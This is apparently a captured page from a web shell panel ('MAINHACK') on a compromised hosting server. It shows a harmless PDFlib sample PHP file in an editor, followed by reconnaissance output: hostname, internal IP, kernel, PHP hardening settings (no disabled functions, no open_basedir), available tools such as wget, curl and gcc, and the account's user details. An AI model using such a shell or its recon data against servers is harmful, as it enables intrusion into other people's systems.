[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: starter_block.php
File is not writable. Editing disabled.
<? /* $Id: starter_block.php,v 1.4.2.1 2008/05/09 10:11:54 rjs Exp $ * * Block starter: * Import a PDF page containing, and process all blocks. The blocks are * retrieved via pCOS, and the block filling functions are used to * visualize the blocks on the output page. A real-world application would * of course fill the blocks with data retrieved from some external data * source. * * required software: PPS 7 or above * required data: input PDF */ /* This is where the data files are. Adjust as necessary. */ $searchpath = "../data"; $infile = "boilerplate.pdf"; $outfilename = "starter_block.pdf"; $p = PDF_new(); # This means we must check return values of load_font() etc. PDF_set_parameter($p, "errorpolicy", "return"); PDF_set_parameter($p, "SearchPath", $searchpath); /* we use "utf8" as textformat, this allows to use unicode encoding */ PDF_set_parameter($p, "textformat", "utf8"); if (PDF_begin_document($p, $outfilename, "") == 0) { die("Error: " . PDF_get_errmsg($p)); } PDF_set_info($p, "Creator", "PDFlib starter sample"); PDF_set_info($p, "Title", "starter_block"); /* Open a PDF containing blocks */ $indoc = PDF_open_pdi_document($p, $infile, ""); if ($indoc == 0) { die("Error: " . PDF_get_errmsg($p)); } /* Open the first $page */ $page = PDF_open_pdi_page($p, $indoc, 1, ""); if ($page == 0) { die("Error: " . PDF_get_errmsg($p)); } $width = PDF_pcos_get_number($p, $indoc, "pages[0]/width"); $height = PDF_pcos_get_number($p, $indoc, "pages[0]/height"); PDF_begin_page_ext($p, $width, $height, ""); /* Place the imported $page on the output $page */ PDF_fit_pdi_page($p, $page, 0, 0, ""); /* Query the number of blocks on the first page */ $blockcount = PDF_pcos_get_number($p, $indoc, "length:pages[0]/blocks"); if ($blockcount == 0) { die("Error: " . $infile . "does not contain any PDFlib blocks"); } /* Loop over all blocks on the $page */ for ($i = 0; $i < $blockcount; $i++) { /* Fetch the name and type of the $i-th block on the first page * (one of Text/Image/PDF) */ $blockname = PDF_pcos_get_string($p, $indoc, "pages[0]/blocks[" . $i . "]/Name"); $blocktype = PDF_pcos_get_string($p, $indoc, "pages[0]/blocks[" . $i . "]/Subtype"); /* Visualize all text blocks */ if ($blocktype == "Text") { $optlist = "fontname=Helvetica encoding=unicode " . "fillcolor={rgb 1 0 0} " . "bordercolor={gray 0} linewidth=0.25"; /* We simply use the $blockname as content */ if (PDF_fill_textblock($p, $page, $blockname, $blockname, $optlist) == 0) { print("Warning: " . PDF_get_errmsg($p)); } } } PDF_end_page_ext($p, ""); PDF_close_pdi_page($p, $page); PDF_end_document($p, ""); PDF_close_pdi_document($p, $indoc); PDF_delete($p); print "$outfilename generated"; ?>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.2 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A